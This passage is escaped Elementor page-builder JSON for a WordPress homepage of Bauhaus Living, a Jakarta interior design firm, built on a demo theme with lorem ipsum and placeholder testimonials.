template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic 